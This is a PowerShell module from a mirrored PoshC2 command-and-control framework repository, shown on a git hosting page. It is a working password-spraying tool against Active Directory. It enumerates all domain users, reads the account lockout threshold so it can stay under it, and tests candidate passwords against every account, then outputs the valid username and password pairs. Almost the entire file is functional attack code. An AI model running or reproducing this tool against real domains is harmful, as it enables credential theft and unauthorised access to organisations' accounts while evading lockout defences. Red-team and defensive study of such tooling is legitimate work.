infosecn1nja
/
PoshC2_Python
mirror of https://github.com/infosecn1nja/PoshC2_Python.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
PoshC2_Python/Modules/Brute-AD.ps1

129 lines
3.9 KiB
PowerShell
Raw Blame History

<#
.Synopsis
Brute forces active directory user accounts
.DESCRIPTION
Brute forces active directory user accounts
.EXAMPLE
PS C:\> Brute-Ad
Bruteforce all accounts in AD with a given password or list of passwords.
.EXAMPLE
Brute-Ad -list password1,password2,'$password$','$Pa55w0rd$'
Brute force all accounts in AD with a provided list of passwords.
.EXAMPLE
Brute-Ad -List password1
Brute force all accounts in AD with just one password.
.EXAMPLE
Brute-Ad -list Password1,password2,'$password$','$Pa55w0rd$',password12345
The provided list will be used: Password1 password2 $password$ $Pa55w0rd$ password12345
.EXAMPLE
Brute-Ad -list Password1,password2 -domain test.ad.com
Username Password IsValid
-------- -------- -------
{Administrator} $Pa55w0rd$ True
{jdoe} Password1 True
#>
function Brute-Ad
{
[cmdletbinding()]
Param
(
[string[]]$list,
$domain
)
Write-Output ""
Write-Output "[+] Brute-ad module started"
Write-Output ""
if ($list)
{
$allpasswords = $list
Write-Output 'The provided list will be used: '$allpasswords`n
}
else
{
$allpasswords = @('Password1')
Write-Output 'The built-in list will be used: '$allpasswords`n
}
Function Get-LockOutThreshold
{
$domain = [ADSI]"WinNT://$env:userdomain"
$Name = @{Name='DomainName';Expression={$_.Name}}
$AcctLockoutThreshold = @{Name='Account Lockout Threshold (Invalid logon attempts)';Expression={$_.MaxBadPasswordsAllowed}}
$domain | Select-Object $AcctLockoutThreshold
}
$lockout = Get-LockOutThreshold
Function Test-ADCredential
{
Param($username, $password, $domain)
Add-Type -AssemblyName System.DirectoryServices.AccountManagement
$ct = [System.DirectoryServices.AccountManagement.ContextType]::Domain
$pc = New-Object System.DirectoryServices.AccountManagement.PrincipalContext($ct, $domain)
$object = New-Object PSObject | Select-Object -Property Username, Password, IsValid
$object.Username = $username;
$object.Password = $password;
$object.IsValid = $pc.ValidateCredentials($username, $password).ToString();
return $object
}
$username = ''
$lockoutthres = $lockout.'Account Lockout Threshold (Invalid logon attempts)'
if (!$lockoutthres)
{
$passwords = $allpasswords #no lockout threshold
}
elseif ($lockoutthres -eq 1)
{
$passwords = $allpasswords | Select-Object -First 1
}
else
{
$passwords = $allpasswords | Select-Object -First ($lockoutthres -=1)
}
if (!$domain)
{
$domain = $env:USERDOMAIN
$DirSearcher = New-Object System.DirectoryServices.DirectorySearcher([adsi]'')
$DirSearcher.Filter = '(&(objectCategory=Person)(objectClass=User))'
$DirSearcher.FindAll().GetEnumerator() | ForEach-Object{
$username = $_.Properties.samaccountname
foreach ($password in $passwords)
{
$result = Test-ADCredential -username $username -password $password -domain $domain
$result | Where {$_.IsValid -eq $True}
}
}
} else {
$forest= [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
$domainname= $forest.Domains | ? {$_.Name -like "$($domain)*"}
if ($domainname.Count -gt 1) {
echo "[-] More than one match for domain: *$($domain)*"
echo "Please use FQDN"
echo $domainname
} else {
$domainDN=$domainname.GetDirectoryEntry().distinguishedName
$Searcher=New-Object System.DirectoryServices.DirectorySearcher([ADSI]"LDAP://$domainDN")
$Searcher.Filter = '(&(objectCategory=Person)(objectClass=User))'
$domain = $domainname.name
$Searcher.FindAll().GetEnumerator() | ForEach-Object{
$username = $_.Properties.samaccountname
foreach ($password in $passwords)
{
$result = Test-ADCredential -username $username -password $password -domain $domain
$result | Where {$_.IsValid -eq $True}
}
}
}
}
Write-Output ""
Write-Output "[+] Module completed"
}
Reference in New Issue View Git Blame Copy Permalink